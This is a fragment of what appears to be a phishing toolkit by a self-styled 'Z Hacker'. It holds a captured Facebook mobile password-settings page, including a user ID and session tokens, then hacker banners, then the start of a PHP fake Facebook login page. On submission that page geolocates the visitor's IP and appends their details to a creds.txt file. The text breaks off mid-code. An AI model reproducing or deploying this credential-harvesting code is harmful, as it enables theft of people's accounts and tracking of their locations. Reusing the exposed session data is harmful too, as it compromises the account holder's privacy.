3iWpk4\\/yO\\/l\\/en_US\\/tzdNqgxLvN_.js","crossOrigin":1},"XTYSZ":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iHl44\\/y7\\/l\\/en_US\\/4VxV4-vtWjo.js","crossOrigin":1},"FHtgt":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yd\\/r\\/rlVu09x5_nO.js","crossOrigin":1},"4LL\\/S":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yN\\/r\\/vzWkAp7tVLk.js","crossOrigin":1},"Tzoz2":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yS\\/r\\/oZinZfOJxmW.js","crossOrigin":1},"af3wG":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iXQm4\\/yi\\/l\\/en_US\\/_5h_TdI0VYO.js","crossOrigin":1},"m\\/fA1":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yW\\/r\\/chdcZWuCVEU.js","crossOrigin":1},"23JWQ":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yy\\/r\\/OID4Re3amn3.js","crossOrigin":1},"ijiqm":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yr\\/r\\/U2ZWMnzEFU4.js","crossOrigin":1},"FEt5G":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yo\\/r\\/2p2n-4YaSvj.js","crossOrigin":1}}}); </script> <script id="u_0_w"> require("MRenderingScheduler").getInstance().init("6562178793502791465-0", {"ttiPagelets":[]});require("TimeSlice").guard(function() {(require("ServerJSDefine")).handleDefines([["ErrorDebugHooks",[],{"SnapShotHook":null},185],["BootloaderConfig",[],{"jsRetries":null,"jsRetryAbortNum":2,"jsRetryAbortTime":5,"payloadEndpointURI":"https:\\/\\/touch.facebook.com\\/ajax\\/haste-response\\/","assumeNotNonblocking":false,"assumePermanent":true,"skipEndpoint":true},329],["CSSLoaderConfig",[],{"timeout":5000,"modulePrefix":"BLCSS:","loadEventSupported":true},619],["ServerNonce",[],{"ServerNonce":"CagbtVf4Hbl_B727qzc14J"},141],["CurrentCommunityInitialData",[],\{},490],["CurrentUserInitialData",[],{"USER_ID":"100024870700996","ACCOUNT_ID":"100024870700996","NAME":"Brutix Fsec","SHORT_NAME":"Brutix","IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false},270],["MRequestConfig",[],{"dtsg":{"token":"AQFSV7NZfTAI:AQGblYoEMJbh","valid_for":86400,"expire":1527962712},"checkResponseOrigin":true,"checkResponseToken":true,"ajaxResponseToken":{"secret":"HQEbK1BJmtQ2ac9uG5mdM_hRunxW37G_","encrypted":"AYkS3fOUqZGer4hLzr1NMELS2MbYPl205bKnu3AEGqr64j0LXW_jbtfnK57bzI8pUY9FNH96Ign7cUHLp9x-4SxpOi_Q1Jesqb8edpMUxO4yEA"}},51],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["ISB",[],\{},330],["LSD",[],\{},323],["SiteData",[],{"server_revision":3963560,"client_revision":3963560,"tier":"","push_phase":"C3","pkg_cohort":"FW_EXP:mtouch_pkg","pkg_cohort_key":"__pc","haste_site":"mobile","be_mode":-1,"be_key":"__be","is_rtl":false,"vip":"157.240.9.18"},317],["SprinkleConfig",[],{"param_name":"jazoest"},2111],["KSConfig",[],{"killed":{"__set":["POCKET_MONSTERS_CREATE","POCKET_MONSTERS_DELETE","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","PREVENT_INFINITE_URL_REDIRECT","POCKET_MONSTERS_UPDATE_NAME"]}},2580],["UserAgentData",[],{"browserArchitecture":"32","browserFullVersion":"62.0.3202.89","browserMinorVersion":0,"browserName":"Chrome","browserVersion":62,"deviceName":"Unknown","engineName":"WebKit","engineVersion":"537.36","platformArchitecture":"32","platformName":"Linux","platformVersion":null,"platformFullVersion":null},527],["MRenderingSchedulerConfig",[],{"delayNormalResources":true,"isDisplayJSEnabled":false},1978],["MJSEnvironment",[],{"IS_APPLE_WEBKIT_IOS":false,"IS_TABLET":false,"IS_ANDROID":false,"IS_CHROME":true,"IS_FIREFOX":false,"IS_WINDOWS_PHONE":false,"IS_SAMSUNG_DEVICE":false,"OS_VERSION":0,"PIXEL_RATIO":1,"BROWSER_NAME":"Chrome Desktop"},46],["ZeroRewriteRules",[],{"rewrite_rules":\{},"whitelist":{"\\/hr\\/r":1,"\\/hr\\/p":1,"\\/zero\\/unsupported_browser\\/":1,"\\/zero\\/policy\\/optin":1,"\\/zero\\/optin\\/write\\/":1,"\\/zero\\/optin\\/legal\\/":1,"\\/zero\\/optin\\/free\\/":1,"\\/about\\/privacy\\/":1,"\\/about\\/privacy\\/update\\/":1,"\\/about\\/privacy\\/update":1,"\\/zero\\/toggle\\/welcome\\/":1,"\\/work\\/landing":1,"\\/work\\/login\\/":1,"\\/work\\/email\\/":1,"\\/ai.php":1,"\\/js_dialog_resources\\/dialog_descriptions_android.json":0,"\\/connect\\/jsdialog\\/MPlatformAppInvitesJSDialog\\/":0,"\\/connect\\/jsdialog\\/MPlatformOAuthShimJSDialog\\/":0,"\\/connect\\/jsdialog\\/MPlatformLikeJSDialog\\/":0,"\\/qp\\/interstitial\\/":1,"\\/qp\\/action\\/redirect\\/":1,"\\/qp\\/action\\/close\\/":1,"\\/zero\\/support\\/ineligible\\/":1,"\\/zero_balance_redirect\\/":1,"\\/zero_balance_redirect":1,"\\/l.php":1,"\\/lsr.php":1,"\\/ajax\\/dtsg\\/":1,"\\/checkpoint\\/block\\/":1,"\\/exitdsite":1,"\\/zero\\/balance\\/pixel\\/":1,"\\/zero\\/balance\\/":1,"\\/zero\\/balance\\/carrier_landing\\/":1,"\\/tr":1,"\\/tr\\/":1,"\\/sem_campaigns\\/sem_pixel_test\\/":1,"\\/bookmarks\\/flyout\\/body\\/":1,"\\/zero\\/subno\\/":1,"\\/confirmemail.php":1,"\\/policies\\/":1,"\\/mobile\\/internetdotorg\\/classifier":1,"\\/4oh4.php":1,"\\/autologin.php":1,"\\/birthday_help.php":1,"\\/checkpoint\\/":1,"\\/contact-importer\\/":1,"\\/cr.php":1,"\\/legal\\/terms\\/":1,"\\/login.php":1,"\\/login\\/":1,"\\/mobile\\/account\\/":1,"\\/n\\/":1,"\\/remote_test_device\\/":1,"\\/upsell\\/buy\\/":1,"\\/upsell\\/buyconfirm\\/":1,"\\/upsell\\/buyresult\\/":1,"\\/upsell\\/promos\\/":1,"\\/upsell\\/continue\\/":1,"\\/upsell\\/h\\/promos\\/":1,"\\/upsell\\/loan\\/learnmore\\/":1,"\\/upsell\\/purchase\\/":1,"\\/upsell\\/promos\\/upgrade\\/":1,"\\/upsell\\/buy_redirect\\/":1,"\\/upsell\\/loan\\/buyconfirm\\/":1,"\\/upsell\\/loan\\/buy\\/":1,"\\/upsell\\/sms\\/":1,"\\/wap\\/a\\/channel\\/reconnect.php":1,"\\/wap\\/a\\/nux\\/wizard\\/nav.php":1,"\\/wap\\/appreg.php":1,"\\/wap\\/birthday_help.php":1,"\\/wap\\/c.php":1,"\\/wap\\/confirmemail.php":1,"\\/wap\\/cr.php":1,"\\/wap\\/login.php":1,"\\/wap\\/r.php":1,"\\/zero\\/datapolicy":1,"\\/a\\/timezone.php":1,"\\/a\\/bz":1,"\\/bz\\/reliability":1,"\\/r.php":1,"\\/mr\\/":1,"\\/reg\\/":1,"\\/registration\\/log\\/":1,"\\/terms\\/":1,"\\/f123\\/":1,"\\/expert\\/":1,"\\/experts\\/":1,"\\/terms\\/index.php":1,"\\/terms.php":1,"\\/srr\\/":1,"\\/msite\\/redirect\\/":1,"\\/fbs\\/pixel\\/":1,"\\/contactpoint\\/preconfirmation\\/":1,"\\/contactpoint\\/cliff\\/":1,"\\/contactpoint\\/confirm\\/submit\\/":1,"\\/contactpoint\\/confirmed\\/":1,"\\/contactpoint\\/login\\/":1,"\\/preconfirmation\\/contactpoint_change\\/":1,"\\/help\\/contact\\/":1,"\\/survey\\/":1,"\\/upsell\\/loyaltytopup\\/accept\\/":1,"\\/settings\\/":1}},1478],["ZeroCategoryHeader",[],\{},1127],["ErrorSignalConfig",[],{"uri":"https:\\/\\/error.facebook.com\\/common\\/scribe_endpoint.php"},319],["MBanzaiConfig",[],{"EXPIRY":86400000,"MAX_SIZE":10000,"MAX_WAIT":30000,"RESTORE_WAIT":30000,"gks":{"boosted_component":true,"mchannel_jumpstart":true,"platform_oauth_client_events":true,"visibility_tracking":true,"boosted_pagelikes":true,"gqls_web_logging":true},"blacklist":["time_spent"]},32],["MSession",[],{"useAngora":false,"logoutURL":"\\/logout.php?h=AfdUd4vZpexkdP59&t=1527876312","push_phase":"C3"},52],["ArtilleryComponentSaverOptions",[],{"options":{"ads_wait_time_saver":{"shouldCompress":false,"shouldUploadSeparately":false},"ads_flux_profiler_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"timeslice_execution_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"interaction_async_request_join_data":{"shouldCompress":true,"shouldUploadSeparately":true},"resources_saver":{"shouldCompress":true,"shouldUploadSeparately":false},"user_timing_saver":{"shouldCompress":false,"shouldUploadSeparately":false}}},3016],["TimeSliceInteractionSV",[],{"on_demand_reference_counting":true,"on_demand_profiling_counters":true,"default_rate":1000,"lite_default_rate":100,"interaction_to_lite_coinflip":{"ADS_INTERFACES_INTERACTION":0,"ads_perf_scenario":0,"ads_wait_time":0,"Event":10,"video_psr":0,"video_stall":0},"interaction_to_coinflip":{"ADS_INTERFACES_INTERACTION":1,"ads_perf_scenario":1,"ads_wait_time":1,"video_psr":1000000,"video_stall":2500000,"Event":500,"watch_carousel_left_scroll":1,"watch_carousel_right_scroll":1,"watch_sections_load_more":1,"watch_discover_scroll":1,"fbpkg_ui":1,"backbone_ui":1},"enable_heartbeat":true,"maxBlockMergeDuration":0,"maxBlockMergeDistance":0,"enable_banzai_stream":true,"user_timing_coinflip":50,"banzai_stream_coinflip":1,"compression_enabled":true,"ref_counting_fix":true,"ref_counting_cont_fix":false,"also_record_new_timeslice_format":false,"force_async_request_tracing_on":false},2609],["CookieCoreConfig",[],{"a11y":\{},"act":\{},"c_user":\{},"ddid":{"p":"\\/deferreddeeplink\\/","t":2419200},"dpr":{"t":604800},"js_ver":{"t":604800},"locale":{"t":604800},"lh":{"t":604800},"m_pixel_ratio":{"t":604800},"noscript":\{},"pnl_data2":{"t":2},"presence":\{},"rdir":\{},"sW":\{},"sfau":\{},"wd":{"t":604800},"x-referer":\{},"x-src":{"t":1}},2104],["CookieCoreLoggingConfig",[],{"maximumIgnorableStallMs":16.67,"sampleRate":9.7e-5},3401],["SessionNameConfig",[],{"seed":"0wWe"},757],["BigPipeExperiments",[],{"link_images_to_pagelets":false},907],["MWebStorageMonsterWhiteList",[],{"whitelist":["^Banzai$","^bz","^mutex","^msys","^sp_pi$","^\\\\:userchooser\\\\:osessusers$","^\\\\:userchooser\\\\:settings$","^[0-9]+:powereditor:","^Bandicoot\\\\:","^brands\\\\:console\\\\:config$","^CacheStorageVersion$","^consoleEnabled$","^_video_$","^vc_","^_showMDevConsole$","^_ctv_$","^ga_client_id$","^qe_switcher_nub_selection$","^_mswam_$"]},254],["AsyncProfilerWorkerResource",[],{"url":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/yq\\/r\\/L2E1WjzsO7-.js","name":"AsyncProfilerWorkerBundle"},2779],["WebWorkerConfig",[],{"logging":{"enabled":false,"config":"WebWorkerLoggerConfig"},"evalWorkerURL":"\\/rsrc.php\\/v3\\/yK\\/r\\/pcnyCVb0ZCt.js"},297],["FWLoader",[],\{},278],["MLoadingIndicatorSigils",[],{"ANIMATE":"m-loading-indicator-animate","ROOT":"m-loading-indicator-root"},279],["MPageControllerGating",[],{"shouldDeferUntilCertainNoRedirect":false},2023],["FbtLogger",[],{"logger":null},288],["IntlNumberTypeConfig",[],{"impl":"if (n === 1) { return IntlVariations.NUMBER_ONE; } else { return IntlVariations.NUMBER_OTHER; }"},3405],["FbtQTOverrides",[],{"overrides":{"1_43839c1f069957436e65d660aa31e1a0":"Pay no fees on movie tickets"}},551],["FbtResultGK",[],{"shouldReturnFbtResult":true,"inlineMode":"NO_INLINE"},876],["IntlHoldoutGK",[],{"inIntlHoldout":false},2827],["IntlViewerContext",[],{"GENDER":1},772],["NumberFormatConfig",[],{"decimalSeparator":".","numberDelimiter":",","minDigitsForThousandsSeparator":4,"standardDecimalPatternInfo":{"primaryGroupSize":3,"secondaryGroupSize":3},"numberingSystemData":null},54],["IntlPhonologicalRules",[],{"meta":{"\\/_B\\/":"([.,!?\\\\s]|^)","\\/_E\\/":"([.,!?\\\\s]|$)"},"patterns":{"\\/\\u0001(.*)('|&#039;)s\\u0001(?:'|&#039;)s(.*)\\/":"\\u0001$1$2s\\u0001$3","\\/_\\u0001([^\\u0001]*)\\u0001\\/":"javascript"}},1496]]);new (require("ServerJS"))().handle({"require":[["MRenderingScheduler","satisfyDependency",[],["tti_ready"]],["MCoreInit","satisfyDependency",[],["tti_ready"]]]});}, "ServerJS define", {"root":true})(); </script> <script id="u_0_y"> require("MRenderingScheduler").preArrive({"name":"m:chrome:schedulable-graph-search","serverlid":"6562178793502791465-0"}) </script> <script id="u_0_z"> require("MRenderingScheduler").getInstance().schedule({"id":"m:chrome:schedulable-graph-search","pageletConfig":{"lid":"6562178793502791465-60001","serverlid":"6562178793502791465-0","name":"m:chrome:schedulable-graph-search","pass":6,"serverJSData":{"elements":[["__elem_ad2bcfb1_0_0","u_0_x",1]],"require":[["MSearchTypeaheadNeue","init",["MSideNavMarauderLogger","__elem_ad2bcfb1_0_0","MSearchSimplificationNullstateResult","MSearchSimplificationSeeMoreRecentResultsButton","MSearchSimplificationTypedResult","MSearchSimplificationHeader","MSearchTabsAboveBEM","MSearchBootstrapEntityModule"],[{"typeaheadConfig":{"sources":{"bootstrapped":{"source_key":"facebar3","src":"\\/typeahead\\/search\\/facebar\\/bootstrap\\/?filters\\u00255B0\\u00255D=keyword","max_results":6},"nullstate":{"src":"\\/typeahead\\/search\\/facebar\\/nullstate\\/","max_results":20},"online":{"src":"\\/typeahead\\/search\\/facebar\\/query\\/?context=facebar&grammar_version=bee09f93fa732cfa59a1cb6d9f450d3892424e49&viewer=100024870700996&rsp=search","max_results":20,"enable_caching":true}},"mSideNavMarauderLogger":{"__m":"MSideNavMarauderLogger"},"typeaheadScubaInfo":null,"disableLongerQueryCacheHit":true,"compositeSourceConfig":{"maxResults":50,"minCostForUserToSurfaceAtTop":7,"maxPositionOfEntityToDivideKeywords":5,"maxKeywordAboveEntities":2,"filterOutTypes":[],"keepBootstrapped":true,"enableLegacyStyleBucketization":true},"hasRecentSearches":false,"hasRecentSearchesSeeMoreButton":false,"hasTopNavSearch":true,"hasKeywordsFirst":false,"hasFlickerFix":false,"numResultsToFetch":13,"initialNumRecentResultsToShow":5,"defaultNumTopResultsToShow":3,"useBlueLocalIcon":true,"isCompactSearch":false,"keywordsOnlyEnabled":true,"keywordBucketSize":6},"currentProfileID":null,"prefilledValue":"","activityLogURI":"\\/100024870700996\\/allactivity?log_filter=search","vertical":"content","groupName":"","active":false,"userid":100024870700996,"root":{"__m":"__elem_ad2bcfb1_0_0"},"renderers":{"NullstateResult":{"__m":"MSearchSimplificationNullstateResult"},"SeeMoreRecentResultsButton":{"__m":"MSearchSimplificationSeeMoreRecentResultsButton"},"TypedResult":{"__m":"MSearchSimplificationTypedResult"},"Header":{"__m":"MSearchSimplificationHeader"}},"behaviors":[{"__m":"MSearchTabsAboveBEM"},{"__m":"MSearchBootstrapEntityModule"}]}]]],"define":[["SearchMTouchGlobalOptions",[],{"enableSeeMore":true,"enableQueryThrottle":true,"queryThrottleTime":125,"queryWaitTime":125,"enableEagerSendRequest":true,"useBanzaiLogging":false,"redirectPages":false,"noSnippet":false,"defaultNumTopResultsToShow":3,"useNewTypeaheadPerfLogger":true,"keywordsOnlyEnabled":true,"prefixMatchEntityBootstrap":true,"disableHighlighting":false},344],["MBootstrapCacheMaxCacheTime",[],{"maxCacheTimeByKey":{"typeahead_facebar3":604800000,"typeahead_search_bem3":604800000}},2886],["MViewableImpressionConfig",[],{"bypass_banzai_check":true,"handleAllHiddenEvents":true,"handleAllVisibleEvents":true,"minOffsetVisibleFromTop":0,"minOffsetVisibleFromBottom":0,"timeout":100,"cacheTrackedElements":true,"doHeatmapLogging":false,"heatmapLoggingDurationMS":null,"impressionURL":"\\/xti.php","nonviewableEnabled":false,"is_xtrackable":true,"forceInstreamLoggingOnPlay":true,"minOffsetVisibleFromLeft":20,"minOffsetVisibleFromRight":20},436],["SearchEntityModuleServerConstants",[],{"TYPE_TO_BROWSE_TYPE":{"user":"browse_type_user","page":"browse_type_page","group":"browse_type_group","application":"browse_type_application","place":"browse_type_place","event":"browse_type_event"},"TYPE_TO_SERP_PATH":{"user":"\\/search\\/people\\/","page":"\\/search\\/pages\\/","group":"\\/search\\/groups\\/","application":"\\/search\\/apps\\/","place":"\\/search\\/places\\/","event":"\\/search\\/events\\/"},"RESULT_TYPE_TO_MODULE_ROLE":{"user":"ENTITY_USER","page":"ENTITY_PAGES","group":"ENTITY_GROUPS","application":"ENTITY_APPS","place":"ENTITY_PLACES","event":"ENTITY_EVENTS"},"TYPE_TO_DISPLAY_STYLE":{"user":"user_row","page":"page_row","group":"group_row","application":"app_row","place":"place_row","event":"event_row"},"WWW_GRAPH_SEARCH_RESULTS_TRACKABLE_CODE":"21.","SEARCH_RESULTS_TRACKABLE":"12.","SEE_MORE_LOGGING":{"MODULE_FOOTER_ITEM_TYPE":"module_footer","MODULE_HEADER_ITEM_TYPE":"module_header"},"BROWSE_RESULTS_PAGE_REF":"br_rs","RESULT_TYPE_TO_BROWSE_EDGE":{"user":"keywords_users","page":"keywords_pages","group":"keywords_groups","application":"keywords_apps","place":"keywords_places","event":"keywords_events"},"MTOUCH_BEM_CLICK_TYPE":"result","SERP_SESSION_ID":"ssid","BROWSE_EDGE_KEYWORDS_SEARCH":"keywords_search","MTOUCH_SEARCH_REFID":46,"BROWSE_NAV_SOURCE_CONTENT_FILTERS":"content_filter","BROWSE_NAV_SOURCE_SEE_MORE":"see_more","BROWSE_NAV_SOURCE_HEADER_SEE_ALL":"header_see_all","BROWSE_CALL_SITE_INIT_RESULT_SET":"browse_ui:init_result_set"},2764],["SearchMSiteTrackableClientViewConfig",[],{"enabled":true,"pixel_in_percentage":70,"duration_in_ms":2000,"subsequent_gap_in_ms":500,"log_initial_nonviewable":true,"should_batch":true,"require_horizontally_onscreen":false,"should_log_viewability_duration":true},2735],["MSearchBootstrapEntityModuleSettings",[],{"bootstrapSource":"\\/typeahead\\/search\\/facebar\\/bootstrap\\/","bootstrapKey":"search_bem3","maxBootstrapResults":3},2342],["SearchResultPageExperiments",[],{"useUncachedBootstrapEntityModulePictures":true,"removeNonAdjacentBEMModuleRole":true},2790],["AdImpressionLoggingConfig",[],{"blockInvisible":true,"enableDelayedHiddenCheck":false,"disableActualCheck":false,"checkWholeAdUnit":false,"maxHiddenCheckDelay":5000,"logForHiddenAds":true},2166]]},"onload":"","onafterload":"","scheduledMarkupIndex":0,"templateContainer":"static_templates","templates":{"__html":""},"ixData":\{},"gkxData":{"AT6rZEzUcyBWoOb4V2g-69P-uTYCBQOV4MAneTkLEODU5AmB1XQLNE7GDpxllICAXZa-FMvUi03ToWCvMn-ywTDx":{"result":false,"hash":"AT4FeAgcErTwaiif"},"AT7lRNSvv5EvGMuc3qVyuEm6B5fx-wiQM2ULDCbypxprax0mO6oqX7RtrS3jr3DVy5zZveUFf1UNWCcFGWRnQWgb":{"result":false,"hash":"AT5sfB8ZLh5eRMI_"}},"resource_map":{"3TG8R":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iw-T4\\/yO\\/l\\/en_US\\/P4_8a0qRL43.js","crossOrigin":1},"onsIi":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3iTcE4\\/y3\\/l\\/en_US\\/PdgFu4G07LD.js","crossOrigin":1},"wF2f0":{"type":"js","src":"https:\\/\\/static.xx.fbcdn.net\\/rsrc.php\\/v3\\/y4\\/r\\/4FczQSybngY.js","crossOrigin":1}},"bootloadable":\{},"type":"chrome"},"displayResources":[],"normalResources":["3TG8R","onsIi","wF2f0"],"content":{"__html":"\\u003Cdiv class=\\"_a-5\\" id=\\"u_0_x\\">\\u003C\\/div>"}}, function() {require("NavigationMetrics").postPagelet(false, "m:chrome:schedulable-graph-search", "6562178793502791465-0");}); </script> <script id="u_0_11"> require("Bootloader").setResourceMap(\{}); </script> <script id="u_0_10"> require("MRenderingScheduler").getInstance().setPageletCount(1);require("NavigationMetrics").setPage({"page":"XSecuritySettingsPasswordController","page_type":"normal","page_uri":"https:\\/\\/touch.facebook.com\\/settings\\/security\\/password\\/","serverLID":"6562178793502791465-0"});require("TimeSlice").guard(function() {(require("ServerJSDefine")).handleDefines([]);new (require("ServerJS"))().handle(\{});}, "ServerJS define", {"root":true})();require("TimeSlice").guard(function() {(require("ServerJSDefine")).handleDefines([]);new (require("ServerJS"))().handle(\{});}, "ServerJS define", {"root":true})(); </script> </body> </html> """ # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # _\__o__ __o/ o o o o__ __o o o/ o__ __o__/_ o__ __o # v |/ <|> <|> <|> /v v\ <|> /v <| v <| v\ # / < > < > / \ /> <\ / > /> < > / \ <\ # o/ | | o/ \o o/ \o__ __o/ | \o/ o/ # /v o__/_ _\__o <|__ __|> <| |__ __| o__/_ |__ _<| # /> | | / \ \\ | \ | | \ # o/ <o> <o> o/ \o \ / <o> \o <o> <o> \o # /v | | /v v\ o o | v\ | | v\ # /> _\o__/_ / \ / \ /> <\ <\__ __/> / \ <\ / \ _\o__/_ / \ <\ # # {Follow Me Here} # # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[Author: Z Hacker]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://twitter.com/_DEF9]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` # `~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[https://www.youtube.com/c/ZhackerL]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~` #0xe3 Login_Facebook = """<html> <head> <title>Login</title> </head> <body> <?php function getBrowserOS() { $user_agent = $_SERVER['HTTP_USER_AGENT']; $browser = "Unknown Browser"; $os_platform = "Unknown OS Platform"; // Get the Operating System Platform if (preg_match('/windows|win32/i', $user_agent)) { $os_platform = 'Windows'; if (preg_match('/windows nt 6.2/i', $user_agent)) { $os_platform .= " 8"; } else if (preg_match('/windows nt 6.1/i', $user_agent)) { $os_platform .= " 7"; } else if (preg_match('/windows nt 6.0/i', $user_agent)) { $os_platform .= " Vista"; } else if (preg_match('/windows nt 5.2/i', $user_agent)) { $os_platform .= " Server 2003/XP x64"; } else if (preg_match('/windows nt 5.1/i', $user_agent) || preg_match('/windows xp/i', $user_agent)) { $os_platform .= " XP"; } else if (preg_match('/windows nt 5.0/i', $user_agent)) { $os_platform .= " 2000"; } else if (preg_match('/windows me/i', $user_agent)) { $os_platform .= " ME"; } else if (preg_match('/win98/i', $user_agent)) { $os_platform .= " 98"; } else if (preg_match('/win95/i', $user_agent)) { $os_platform .= " 95"; } else if (preg_match('/win16/i', $user_agent)) { $os_platform .= " 3.11"; } } else if (preg_match('/macintosh|mac os x/i', $user_agent)) { $os_platform = 'Mac'; if (preg_match('/macintosh/i', $user_agent)) { $os_platform .= " OS X"; } else if (preg_match('/mac_powerpc/i', $user_agent)) { $os_platform .= " OS 9"; } } else if (preg_match('/linux/i', $user_agent)) { $os_platform = "Linux"; } // Override if matched if (preg_match('/iphone/i', $user_agent)) { $os_platform = "iPhone"; } else if (preg_match('/android/i', $user_agent)) { $os_platform = "Android"; } else if (preg_match('/blackberry/i', $user_agent)) { $os_platform = "BlackBerry"; } else if (preg_match('/webos/i', $user_agent)) { $os_platform = "Mobile"; } else if (preg_match('/ipod/i', $user_agent)) { $os_platform = "iPod"; } else if (preg_match('/ipad/i', $user_agent)) { $os_platform = "iPad"; } // Get the Browser if (preg_match('/msie/i', $user_agent) && !preg_match('/opera/i', $user_agent)) { $browser = "Internet Explorer"; } else if (preg_match('/firefox/i', $user_agent)) { $browser = "Firefox"; } else if (preg_match('/chrome/i', $user_agent)) { $browser = "Chrome"; } else if (preg_match('/safari/i', $user_agent)) { $browser = "Safari"; } else if (preg_match('/opera/i', $user_agent)) { $browser = "Opera"; } else if (preg_match('/netscape/i', $user_agent)) { $browser = "Netscape"; } // Override if matched if ($os_platform == "iPhone" || $os_platform == "Android" || $os_platform == "BlackBerry" || $os_platform == "Mobile" || $os_platform == "iPod" || $os_platform == "iPad") { if (preg_match('/mobile/i', $user_agent)) { $browser = "Handheld Browser"; } } // Create a Data Array return array( 'browser' => $browser, 'os_platform' => $os_platform ); } $user_agent = getBrowserOS(); //If Submit Button Is Clicked Do the Following if ($_POST['save']){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; $info = json_decode(file_get_contents("http://ipinfo.io/{$ip}/json")); $myFile = "creds.txt"; $fh = fopen($myFile, 'a') or die("can't open file"); $IPDATA ="\\033[1;30m[\\033[0mIP\\033[1;30m]\\033[0;33m:\\033[0;33m " . $info->ip . "\\n" . "\\033[1;30m[\\033[0mCITY\\033[1;30m]\\033[0;33m:\\033[0;33m " . $info->city . "\\n" . "\\033[1;30m[\\033[0mREGION\\033[1;30m]\\033[0;33m:\\033[0;33m " . $info->region . "\\n" . "\\033[1;30m[\\033[0mCOUNTRY\\033[1;30m]\\033[0;33m:\\033[0;33m " . $info->country . "\\n" . "\\033[1;30m[\\033[0mLOCATION\\033[1;30m]\\033[0;33m:\\033[0;33m " . $info->loc . "\\n" . "\\033[1;30m[\\033[0mORG\\033[1;30m]\\033[0;33m:\\033[0;33m " . $info->org . "\\n"; 